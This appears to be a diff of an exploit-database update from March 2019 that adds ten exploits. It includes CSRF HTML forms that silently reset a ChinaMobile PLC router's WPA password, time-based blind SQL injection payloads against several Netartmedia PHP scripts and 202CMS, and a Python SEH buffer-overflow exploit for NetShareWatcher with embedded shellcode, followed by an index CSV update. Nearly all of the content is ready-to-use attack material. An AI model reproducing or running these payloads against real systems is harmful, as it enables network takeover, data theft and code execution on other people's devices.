DB: 2019-03-21

10 changes to exploits/shellcodes

NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow
Netartmedia PHP Car Dealer - SQL Injection
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
Netartmedia Jobs Portal 6.1 - SQL Injection
Netartmedia PHP Dating Site - SQL Injection
Netartmedia PHP Business Directory 4.2 - SQL Injection
202CMS v10beta - Multiple SQL Injection
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
Netartmedia Deals Portal - 'Email' SQL Injection

exploits/hardware/webapps/46580.txt

@@ -0,0 +1,70 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access
+Control
+# Date: 14/01/2019
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Windows
+# CVE : CVE-2019-6279
+
+#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with
+firmware
+W2001EN-00 have an Incorrect Access Control vulnerability via the
+cgi-bin/webproc?getpage=html/index.html
+subpage=wlsecurity URI, allowing an Attacker to change the Wireless
+Security Password.
+
+Reproduction Steps:
+Step 1: Building a malicious html web page
+Step 2: Attacker’s wants to change the wireless security (WPA/WPA2) key to
+“PSWDmatlo331#@!” (in my case)
+
+Step 3: (192.168.59.254 in my Case)
+<html>
+<body>
+<form method=”POST” action=”http://192.168.59.254:80/cgi-bin/webproc “>
+<input type=”text” name=”sessionid” value=”2a39a09e”>
+<input type=”text” name=”language” value=”en_us”>
+<input type=”text” name=”sys_UserName” value=”admin”>
+<input type=”text” name=”var:menu” value=”setup”>
+<input type=”text” name=”var:page” value=”wireless”>
+<input type=”text” name=”var:subpage” value=”wlsecurity”>
+<input type=”text” name=”var:errorpage” value=”wlsecurity”>
+<input type=”text” name=”getpage” value=”html/index.html”>
+<input type=”text” name=”errorpage” value=”html/index.html”>
+<input type=”text” name=”var:arrayid” value=”0?>
+<input type=”text” name=”obj-action” value=”set”>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType ”
+value=”11i”>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes”
+value=”AESEncryption”>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode”
+value=”PSKAuthentication”>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey”
+value=”100?>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase”
+value=”PSWDmatlo331#@!”>
+<input type=”text”
+name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression”
+value=”KeyPassphrase”>
+<input type=”submit” value=”Send”>
+</form>
+</body>
+</html>
+
+Step 4: save this as Incorrect_Access_Control.html
+Step 5: Planting this malicious web page (Incorrect_Access_Control.html)
+that are likely to be visited by the victim’s (by social engineering) or
+any user connected in the Access Point (AP) will have to visit this page or
+any attacker’s connected in the AP will trigger this exploit.
+Step 6: After execution of above exploit, wireless security (WPA/WPA2) key
+will change!!
+
+Note: This vulnerability allowing an attacker to reproduce without login.

exploits/hardware/webapps/46581.txt

@@ -0,0 +1,50 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)
+# Date: 14/01/2019
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Windows
+# CVE : CVE-2019-6282
+
+#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware
+W2001EN-00 have CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html
+subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.
+
+#Reproduction Steps:
+
+Note: This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+
+Step 1: User login to PLC wireless router
+
+Step 2: User visits the attacker's malicious web page (PLC_CSRF.html)
+
+Step 3: PLC_CSRF.html exploits CSRF vulnerability and changes the wireless Security (WPA/WPA2) key to "PSWDmatlo331#@!"
+
+Step 4: (192.168.59.254 in my Case)
+
+<html>
+<body>
+  <form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
+    <input type="text" name="sessionid" value="2a39a09e">
+    <input type="text" name="language" value="en_us">
+    <input type="text" name="sys_UserName" value="admin">
+    <input type="text" name="var:menu" value="setup">
+    <input type="text" name="var:page" value="wireless">
+    <input type="text" name="var:subpage" value="wlsecurity">
+    <input type="text" name="var:errorpage" value="wlsecurity">
+    <input type="text" name="getpage" value="html/index.html">
+    <input type="text" name="errorpage" value="html/index.html">
+    <input type="text" name="var:arrayid" value="0">
+    <input type="text" name="obj-action" value="set">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
+    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
+    <input type="submit" value="Send">
+  </form>
+</body>
+</html>

exploits/php/webapps/46573.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Netartmedia  PHP Car Dealer- SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/autodealer/
+# Demo Site: https://www.phpscriptdemos.com/autodealer/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description:The PHP Car Dealer script is also using a flexible
+template system - the
+ templates can be modified or new ones to be created in order to
+completely customize the website look and feel.
+
+----- PoC 1 SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+
+Parameter features[] (POST)
+
+Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=

exploits/php/webapps/46574.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/propertyagency/
+# Demo Site: https://www.phpscriptdemos.com/agency/
+# Version: 4.0
+# Tested on: Kali Linux
+# CVE: N/A
+# Description:PHP Real Estate Agency is a web software written in PHP
+especially designed for real estate agencies to help create quickly
+and launch their own websites with their listings and information on
+it.
+----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+Parameter: features[] (POST)
+Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1

exploits/php/webapps/46575.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/jobsportal/
+# Demo Site: https://www.ittjobs.com/
+# Version: 6.1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

exploits/php/webapps/46576.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Netartmedia Php Dating Site - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/datingsite/
+# Demo Site: https://www.phpscriptdemos.com/dating/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description: PHP Dating Site is a complete web system for creating
+advanced and modern online dating websites.
+
+ ----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

exploits/php/webapps/46577.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.phpbusinessdirectory.com/
+# Demo Site: https://www.bizwebdirectory.com/
+# Version: 4.2
+# Tested on: Kali Linux
+# CVE: N/A
+ ----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/USERS/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

exploits/php/webapps/46579.txt

@@ -0,0 +1,50 @@
+===========================================================================================
+# Exploit Title: 202CMS - 'log_user' SQL Inj.
+# Dork: N/A
+# Date: 20-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://sourceforge.net/projects/b202cms/
+# Software Link: https://sourceforge.net/projects/b202cms/
+# Version: v10 beta
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: 202CMS is small, but functionally CMS. It is based
+on Twitter Bootstrap
+  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
+highly customizable
+  and extremely easy to setup. The script is not finished, but soon I'm
+going to finish it.
+===========================================================================================
+# POC - SQLi (blind)
+# Parameters : log_user
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# POST Method : http://localhost/202cms10beta/index.php
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: 202CMS - 'register.php' SQL Inj.
+# Dork: N/A
+# Date: 20-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://sourceforge.net/projects/b202cms/
+# Software Link: https://sourceforge.net/projects/b202cms/
+# Version: v10 beta
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: 202CMS is small, but functionally CMS. It is based
+on Twitter Bootstrap
+  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
+highly customizable
+  and extremely easy to setup. The script is not finished, but soon I'm
+going to finish it.
+===========================================================================================
+# POC - SQLi (blind)
+# Parameters : register.php, reg_user,reg_mail
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
+# POST Method : http://localhost/202cms10beta/register.php
+===========================================================================================

exploits/php/webapps/46582.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/dealsportal/
+# Demo Site: https://www.phpscriptdemos.com/deals/i
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+----- PoC: SQLi -----
+# Request: http://localhost/[PATH]/loginaction.php
+# Vulnerable Parameter: Email (POST)
+# Attack Pattern:
+Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

exploits/windows/local/46578.py

@@ -0,0 +1,52 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
+# Date: 2019-03-19
+# Vendor Homepage: http://netsharewatcher.nsauditor.com
+# Software Link:  http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Exploit Author: Peyman Forouzan
+# Tested Version: 1.5.8.0
+# Tested on: Windows XP SP2 - SP3
+
+# 1- Run python code : NetShareWatcher.py
+# 2- Open Exploit.txt and copy content to clipboard
+# 3- Open NetShareWatcher
+# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
+# 5- Paste the content of Exploit.txt into the box
+# 6- Click 'Find'
+# 7- Calc.exe Open ( Can be replaced with Shellcode )
+
+#!/usr/bin/python
+
+buffer = "\x41" * 262
+nseh = "\xeb\x14\x90\x90"  # Overwrite Next Seh With Short jmp
+seh = "\x90\xBF\xC9\x74"   # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
+nops = "\x90" * 20
+
+# Calc.exe payload [size 227]
+buf =""
+buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
+buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
+buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
+buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
+buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
+buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
+buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
+buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
+buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
+buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
+buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
+buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
+buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
+buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
+buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
+buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
+buf += "\x9a\xca\xc0";
+
+payload = buffer + nseh + seh + nops + buf
+try:
+    f=open("Exploit.txt","w")
+    print "[+] Creating %s bytes payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File can't be created"

files_exploits.csv

@@ -10371,6 +10371,7 @@ id,file,description,date,author,type,platform,port
 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
+46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41015,3 +41016,12 @@ id,file,description,date,author,type,platform,port
 46560,exploits/php/webapps/46560.txt,"Netartmedia Event Portal 2.0 - 'Email' SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
 46562,exploits/php/webapps/46562.txt,"Netartmedia PHP Mall 4.1 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
 46563,exploits/php/webapps/46563.txt,"Netartmedia Real Estate Portal 5.0 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
+46573,exploits/php/webapps/46573.txt,"Netartmedia PHP Car Dealer - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46574,exploits/php/webapps/46574.txt,"Netartmedia PHP Real Estate Agency 4.0 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46575,exploits/php/webapps/46575.txt,"Netartmedia Jobs Portal 6.1 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46576,exploits/php/webapps/46576.txt,"Netartmedia PHP Dating Site - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46577,exploits/php/webapps/46577.txt,"Netartmedia PHP Business Directory 4.2 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46579,exploits/php/webapps/46579.txt,"202CMS v10beta - Multiple SQL Injection",2019-03-20,"Mehmet EMIROGLU",webapps,php,80
+46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80
+46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80
+46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80